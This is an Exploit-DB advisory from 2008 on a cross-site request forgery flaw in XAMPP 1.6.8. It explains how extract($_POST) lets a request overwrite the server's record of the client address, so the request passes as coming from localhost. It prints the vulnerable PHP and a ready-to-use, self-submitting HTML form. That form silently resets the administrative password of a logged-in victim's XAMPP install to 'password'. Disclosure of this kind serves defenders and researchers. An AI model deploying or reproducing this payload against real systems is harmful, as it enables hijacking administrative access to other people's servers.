XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)

EDB-ID:

7384




Platform:

Windows

Date:

2008-12-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php

There are two vulnerabilities that are being used toagther.
1)Global variable manipulation to spoof ip address.
2)XSRF to change the .htaccess password for http://10.1.1.10/security/
 and http://10.1.1.10/xampp/ .

The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable,  including the $_SERVER superglobal.  This can be used to
"spoof"  your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser in any ip address, so
long as that browser is currently authenticated.

This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
       error_reporting(0);
       extract($_POST);
       extract($_SERVER);
       $host = "127.0.0.1";
       $timeout = "1";

       if ($REMOTE_ADDR) {
               if ($REMOTE_ADDR != $host) {
                       echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                       exit;
               }
       }
//...

//Start of xsrf attack
<html>
	<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
	          <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
		<input type=hidden name="xamppuser" value=admin >
		<input type=hidden name="xampppasswd" value=password>
		<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
		<input type=submit>
	</form>
</html>
<script>
	document.getElementById(1).submit();
</script>
//End of xsrf attack

# milw0rm.com [2008-12-08]